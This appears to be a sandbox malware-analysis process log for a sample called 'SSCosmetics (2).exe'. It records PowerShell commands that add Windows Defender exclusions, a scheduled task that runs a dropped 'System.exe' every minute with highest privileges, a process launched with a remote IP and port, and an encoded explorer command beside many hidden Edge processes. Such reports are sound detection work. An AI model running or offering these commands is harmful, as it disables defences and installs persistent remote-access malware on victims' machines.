PID 1932 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1932 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe

"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSCosmetics (2).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 21574 <123456789> DF9D76493D2052CA298B

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2760 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5080 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8011230451825925835,11903101137192340615,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2832 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2392 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4740 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

